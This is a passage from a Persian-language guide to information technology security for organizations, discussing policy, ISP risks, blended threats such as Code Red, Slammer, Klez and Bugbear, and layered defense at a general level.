‫ﺑﻬﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﻨﻲ ﻛـﻪ ﺟﻬـﺖ‬
‫ﻲ ﻛــﺎﺭﺁ ﺑــﺮﺍﻱ ﺳــﺎﺯﻣﺎﻥ ﻻﺯﻡ‬
‫ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ ﻳــﻚ ﺳﻴــﺴﺘﻢ ﺍﻣﻨﻴﺘ ـ ﹺ‬
‫ﻣﻲﺑﺎﺷﻨﺪ ﻳﻚ ﺑﺨـﺶ ﺿـﺮﻭﺭﻱ ﻭ ﺍﺳﺎﺳـﻲ ﺍﻫـﺪﺍﻑ ﺗﺠـﺎﺭﻱ ﺭﺍ‬
‫ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺩﺭ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺑﻬﺎ ﺩﺍﺩ‪.‬‬
‫‪١٢٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔـﺮ ﺩﺭ ﺣـﻮﺯﻩﻫـﺎﻳﻲ‬
‫ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ ﺩﻳﮕـﺮﺍﻥ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﻼ ﺣـﻮﺯﺓ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺑﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ‪ -‬ﻣـﺜ ﹰ‬
‫ﺗﻮﺳﻌﻪ ‪ -‬ﺑﺎﻳﺪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺤﺘﻤﻞ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ‬
‫ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻨﺪ ﻭ ﻃﺮﺣﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﺗـﺄﺛﻴﺮ ﺁﻧﻬـﺎ ﺗـﺪﻭﻳﻦ‬
‫ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﮔﺮ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﻫﺮ ﻧﺤﻮ ﺑﻪ ﺍﻣﻨﻴﺖ‬
‫ﺩﻭﻟﺖ ﻣﺮﺑﻮﻁ ﻣـﻲﺷـﻮﺩ ‪ -‬ﻣﺜـﻞ ﺍﺭﺍﺋـﻪ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ ‪ -‬ﺑﺎﻳﺪ ﻣﺘﻮﺟﻪ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺩﺭ ﭼـﻪ ﺯﻣـﺎﻧﻲ ﻭ‬
‫ﭼﮕﻮﻧﻪ ﻣﺴﺌﻮﻟﻴﺖ ﻗﺎﻧﻮﻧﻲ ﭘﺎﻳﺒﻨﺪﻱ ﺑﻪ ﺍﺣﻜـﺎﻡ ﺩﻭﻟﺘـﻲ ﺑـﺮ ﻋﻬـﺪﺓ‬
‫ﺁﻧﻬﺎﺳﺖ‪ .‬ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺳﺮﻭﻳﺲ ﺍﻳﻨﺘﺮﻧـﺖ )‪ ١٠(ISP‬ﻧﻤﻮﻧـﻪﺍﻱ‬
‫ﺍﺳﺖ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎ ﻫﺮ ﺩﻭ ﻧﻮﻉ ﻣﺨﺎﻃﺮﻩ ﻣﻮﺍﺟﻪ ﺍﺳـﺖ‪ .‬ﺑـﺎ‬
‫ﺍﺗﺼﺎﻝ ﻣﺸﺘﺮﻱ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﺠﻬﻴـﺰﺍﺕ ﻣـﺸﺘﺮﻱ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ‪ ،‬ﻭ ﺑﺎ ﻓﺮﺍﻫﻢ ﻛـﺮﺩﻥ ﻣﺤﺘﻮﻳـﺎﺕ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭ ﺍﺑﺰﺍﺭ ﺍﺭﺗﺒﺎﻃﻲ‪ ISP ،‬ﺩﺭ ﻣﻌﺮﺽ ﺍﺣﻜـﺎﻡ ﻭ ﻣﻘـﺮﺭﺍﺕ‬
‫ﻛﺸﻮﺭﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﮔﺮ ﻛﺴﻲ ﻗﺎﺑﻠﻴﺖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ‬
‫ﻧﻴﺰ ﺑﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺑﻴﺎﻓﺰﺍﻳﺪ‪ ،‬ﺗﻬﺪﻳﺪﺍﺕ ﺑﺎﻟﻘﻮﻩ ﻭ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺍﺯ ﭘﺎﻳﺒﻨﺪﻱ ﺑﻪ ﺗﻌﻬﺪﺍﺕ‪ ،‬ﺗﺒﺪﻳﻞ ﺑـﻪ ﻣـﺸﻜﻼﺗﻲ ﺑـﺴﻴﺎﺭ ﻋﻈـﻴﻢ ﻭ‬
‫ﺍﺳﺎﺳﻲ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺧﻄﺮﻫﺎﻱ ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﮔﺎﻧﻪ‬
‫ﻱ ﭼﻨـﺪ ﻣﻨﺒـﻊ ﻣﻮﺛـﻖ‪ ،‬ﻳـﻚ ﺭﻭﻧـﺪ ﺻـﻌﻮﺩﻱ ﺩﺭ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺁﻣـﺎﺭ ﹺ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻫﺪﺍﻑ ﺟﻨـﺎﻳﻲ ﺭﺍ‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﮔﺰﺍﺭﺷـﺎﺕ ﻣﺘﻌـﺪﺩﻱ ﺑـﻪ ﭼﻨـﻴﻦ‬
‫ﻣﻮﺿﻮﻋﺎﺗﻲ ﻣﺮﺑﻮﻁ ﺑﻮﺩ‪ :‬ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺁﻟﻮﺩﻩ‪ ،‬ﺗﻐﻴﻴﺮ ﺷﻜﻞ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ ﺑـﺎ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻱ ﺳﻴﺎﺳـﻲ‪،‬‬
‫ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷﺪﺓ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ )‪ ١١(DDoS‬ﻋﻠﻴـﻪ ﺍﻫـﺪﺍﻑ‬
‫ﺗﻌﻴﻴﻦﺷﺪﺓ ﺳﺎﺯﻣﺎﻧﻲ‪ ،‬ﻭ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ‪.‬‬
‫ﺑﻌﻼﻭﻩ‪ ،‬ﮔﺴﺘﺮﺩﮔﻲ ﺗﻬﺪﻳـﺪﺍﺕ ﭼﻨـﺪﻭﺟﻬﻲ‪ ١٢‬ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ‬
‫ﻫﻤﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻱ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ .‬ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺑﻪ ﺣـﻮﺯﺓ‬
‫ﺧﺎﺻﻲ ﺗﻌﻠﻖ ﻧﺪﺍﺭﻧﺪ ﻭﻟﻲ ﺗﻤﺎﻡ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﻨـﺪ‪.‬‬
‫ﺑــﺮﺍﻱ ﻣﺜــﺎﻝ ﻛــﺮﻡ ‪ Klez‬ﺑــﺎ ﺧــﺼﻮﺻﻴﺎﺗﻲ ﺑــﻪ ﻧﮕــﺎﺭﺵ‬
‫ﺩﺭﺁﻣﺪﻩ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻣﻌﺘﻘﺪﻧﺪ ﻳﺎ ﺩﺭ ﭼـﻴﻦ ﻭ ﻳـﺎ‬
‫ﺩﺭ ﻫﻨﮓﻛﻨﮓ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺁﺳﻴﺎﻳﻲ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨـﺪﻩﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‬
‫‪Internet Service Provider‬‬
‫‪Distributed Denial of Service Attack‬‬
‫‪Blended Threats‬‬
‫‪10‬‬
‫‪11‬‬
‫‪12‬‬
‫ﺑﻲﺣﻔﺎﻅ ﻫﺴﺘﻨﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺍﺯ ﺍﺻـﻮﻝ ﺍﻭﻟﻴـﺔ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﺍﻳﻤﻦ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﺎﺁﮔﺎﻫﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﺣﺘﻤﺎﻝ ﻣﻲﺭﻭﺩ ﻣﻨﺎﻃﻘﻲ ﻛﻪ‬
‫ﺍﺯ ﺭﺷﺪ ﻓﻨﻲ ﺑﺎﻻﻳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ‪ -‬ﻣﺜﻞ ﭼﻴﻦ ‪ -‬ﺑﺎ ﭘﺮﺍﻛﻨﺪﻩﺷـﺪﻥ‬
‫ﻭﻳﺮﻭﺳــﻬﺎ‪ ،‬ﻛﺮﻣﻬــﺎ‪ ،‬ﺗﺮﺍﻭﺍﻫــﺎ‪ ،‬ﻭ ﺗﻬﺪﻳــﺪﻫﺎﻱ ﭼﻨــﺪﻭﺟﻬﻲ ﻛــﻪ‬
‫ﺁﻣﻴﺨﺘﻪﺍﻱ ﺍﺯ ﻫﻤﺔ ﺍﻳﻦ ﻋﻮﺍﻣﻞ ﻫﺴﺘﻨﺪ ﻣـﻮﺭﺩ ﺣﻤﻠـﺔ ﻣﻬـﺎﺟﻤﻴﻦ‬
‫ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﻳـﻚ ﻃﻴـﻒ ﺍﺯ ﺣﻔﺎﻇﺘﻬـﺎ ﺭﺍ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﺑﺮﻧﺎﻣﺔ ﺁﻟﻮﺩﻩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﺩﻓﺎﻉ ﻛﺎﻣﻞ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﻫﻤﺔ ﺍﹶﺷﻜﺎﻝ ﺣﻤﻼﺕ‪ ،‬ﻧـﺎﺗﻮﺍﻥ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ‬
‫ﺩﻓﺎﻋﻲ ﭼﻨﺪﻻﻳﻪ‪ ،‬ﻫﻢ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻨـﻲ ﻭ ﻫـﻢ ﺍﺯ ﻟﺤـﺎﻅ ﺍﻧـﺴﺎﻧﻲ‬
‫ﻣﺨﺎﻃﺮﺓ ﺑﺮﻭﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﻮﺳـﻴﻠﺔ ﺑﺮﻧﺎﻣـﺔ ﺁﻟـﻮﺩﻩ ﺭﺍ ﺑـﻪ‬
‫ﺷﺪﺕ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ‪ -‬ﻫﺮﭼﻨﺪ ﺑﺎﺯ ﻫﻢ ﺁﻧﺮﺍ ﺍﺯ ﺑـﻴﻦ ﻧﻤـﻲﺑـﺮﺩ‪.‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ ﻣﺜﻞ ‪،Klez ،Slammer ،Code Red‬‬
‫ﻭ ‪ Bugbear‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺷــﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﻣــﻮﺭﺩ ﺁﺯﺍﺭ‬
‫ﻱ ﺧﻮﺩ ﺁﺛﺎﺭ ﻣﺨﺮﺏ‬
‫ﺩﺍﺋﻤﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺮﻣﻬﺎ ﺑﻪ ﺧﻮﺩ ﹺ‬
‫ﻧﺪﺍﺭﻧﺪ ﺍﻣﺎ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺩﺍﻣﻬـﺎﻳﻲ ﻧـﺼﺐ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺎﻋـﺚ‬
‫ﻣﻲﺷﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﺁﻥ ﺩﺍﻣﻬﺎ ﺁﺷﻨﺎ ﻫﺴﺘﻨﺪ ﺑﻪ ﺷﺒﻜﻪ‬
‫ﺳﺮﻳﻊ ﻭ ﺁﺳﺎﻥ ﮔﺮﺩﺩ‪.‬‬
‫ﺟﺪﺍﻱ ﺍﺯ ﺍﻳﻦ ﻣﻄﻠﺐ‪ ،‬ﻛﺮﻣﻬﺎ ﺍﺯ ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﺩﺭ ﻧـﺎﺗﻮﺍﻥ ﻛـﺮﺩﻥ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻣﺆﺛﺮﺗﺮ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻗﺎﺩﺭﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ‬
‫ﺩﺭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺭﺍﻳــﺞ ‪ -‬ﻣﺜــﻞ ﻣﺮﻭﺭﮔﺮﻫــﺎﻱ ﻭﺏ ‪ -‬ﺭﺍ ﻣــﻮﺭﺩ‬
‫ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﭼﻨﻴﻦ ﺧـﺼﻮﺻﻴﺎﺗﻲ ﺩﺭ ﺁﻧﻬـﺎ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﻣﺨـﺎﻃﺮﺍﺕ ﻣﻮﺟـﻮﺩ ﻭ ﻧﺤـﻮﺓ ﺑـﺮﻭﺯ‬
‫ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳـﺐ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ ﺍﻧﻔـﺮﺍﺩﻱ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﺩ ﺭﺍ‬
‫ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺗﻤـﺮﻳﻦ ﺷـﻮﺩ‪،‬‬
‫ﻣﺨﺎﻃﺮﺓ ﻳﻚ ﺣﻤﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ‬
‫ﻳﺎﺑﺪ‪ ،‬ﺍﻣﺎ ﻣﺠﺪﺩﹰﺍ ﺗﺄﻛﻴﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﺮﮔﺰ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﻪ ﺻـﻔﺮ‬
‫ﺭﺳﺎﻧﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻬﺪﻳـﺪ ﺧﺮﺍﺑﻜـﺎﺭﻱ ﻋﻤـﺪﻱ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳـﺖ‪ ،‬ﺑﺮﺭﺳـﻲ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﺍﻣﻨﻴــﺖ ﺍﻧﻔــﺮﺍﺩﻱ ﻭ ﺗﺮﺍﻛﻨــﺸﻬﺎﻱ ﻣــﺎﻟﻲ ﻭ ﭼﺎﻟــﺸﻬﺎﻱ ﺟﺪﻳــﺪ‬
‫ﻱ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ‬
‫ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺩﺭ ﺑﺴﺘﺮﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍ ﹺ‬
‫ﺍﺳﺖ‪.‬‬
‫‪١٢٥‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻣﺰﺍﻳﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻣﺪﻳﺮﻳﺖ ﺁﻥ‬
‫ﻋﻠﻴﺮﻏﻢ ﭼﺎﻟﺸﻬﺎﻱ ﻣﻮﺟـﻮﺩ‪ ،‬ﻣـﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﺁﻓﺮﻳﻨـﺎﻥ ﺑﺨـﺸﻬﺎﻱ‬
‫ﺩﻭﻟﺘــﻲ ﻭ ﺧــﺼﻮﺻﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ ﺑــﻪ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﻓﻨﺎﻭﺭﻱ ﻧﻮﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷـﺎﻣﻞ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻲﺳﻴﻢ‪ ،‬ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺗﺠﺎﺭﻱ ﻣﺸﻐﻮﻟﻨﺪ ﺗﺎ ﺑﻪ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎﻱ ﺭﻭﺯﻣﺮﺓ ﺧﻮﺩ ﻛﻤﻚ ﻛـﺮﺩﻩ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﻣﺰﺍﻳﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ‬
‫ﺟﺪﻳﺪ ‪ -‬ﻣﺜﻞ ﻛﺎﺭﺁﻳﻲ ﻭ ﺻـﺮﻓﻪﺟـﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨـﻪﻫـﺎ ‪ -‬ﻭﺍﺿـﺢ‬
‫ﻫﺴﺘﻨﺪ‪:‬‬
‫‪.۲‬‬
‫ﺗﻮﺍﻧﺎﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣﺠﻢ ﺯﻳﺎﺩ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺳﺮﻋﺖ ﺯﻳﺎﺩ‬
‫ﻭ ﺑﺼﻮﺭﺕ ﺍﺭﺯﺍﻧﻘﻴﻤﺖ ﺗﻘﻮﻳﺖ ﻣﻲﺷﻮﺩ؛‬
‫‪.۳‬‬
‫ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺗﻮﺳﻌﺔ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﻭ‬
‫ﻣﺪﻳﺮﻳﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﮔﺮﺩﺩ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺑﻬﺘﺮ ﺍﺯ‬
‫ﺍﻗﻼﻡ ﺩﺍﺩﻩ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ ﻣـﺎﻟﻲ‪ ،‬ﺗﺤﻠﻴـﻞ ﺑﻬﺘـﺮ ﺭﻓﺘـﺎﺭ‬
‫ﻣﺸﺘﺮﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ﻭ ﻓﺮﻭﺵ‪ ،‬ﻭ ﺍﺭﺍﺋـﻪ ﺁﻣـﺎﺭ‬
‫ﺩﻗﻴﻘﺘﺮ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺧﻂ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺍﻳﻦ ﺍﺻـﻼﺣﺎﺕ ﺑـﺪﻭﻥ‬
‫ﻣﺨﺎﻃﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ‬
‫ﻭ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﻲ ﻛﻪ ﻛﻤﺘﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺁﻳﻨـﺪ ﺻـﺪﻕ‬
‫ﻣﻲﻛﻨـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺑﺨـﺶ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﺣـﻮﺯﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛـﻪ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﻭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻣـﻲﺷـﻮﻧﺪ ﻣـﻮﺭﺩ‬
‫ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻳﻦ ﺑﺨـﺶ ﺑـﺎ ﺗﻮﺟـﻪ‬
‫ﺧﺎﺹ ﺑﻪ ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻭﺍﻳـﺮ ﺍﺟﺮﺍﻳـﻲ‪ ،‬ﻣـﺪﻳﺮﺍﻥ‪ ،‬ﻭ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﻣـﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻭ‬
‫ﺩﻳﮕﺮ ﺍﻓﺮﺍﺩ ﺫﻳﻨﻔﻊ ﺩﺭ ﺷﺮﻛﺖ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﻓﻬﺮﺳــﺘﻬﺎﻱ ﻛﻨﺘــﺮﻝ‪ ١٣‬ﻭ ﻳﺎﺩﺩﺍﺷــﺘﻬﺎﻱ ﺭﻭﺍﻝﻣﻨــﺪ‪ ١٤‬ﺑﺮﺍﺣﺘــﻲ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳﻂ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﺩﻭﻟﺘـﻲ ﻳـﺎ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﭼﻪ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺗﻬﻴﻪ ﺷﻮﻧﺪ ﻭ ﭼﻪ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺁﻥ‪ ،‬ﺑــﺎﺯ ﻫــﻢ ﺗﻮﺳــﻌﻪ ﻭ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎ‪ ،‬ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﻭ‬
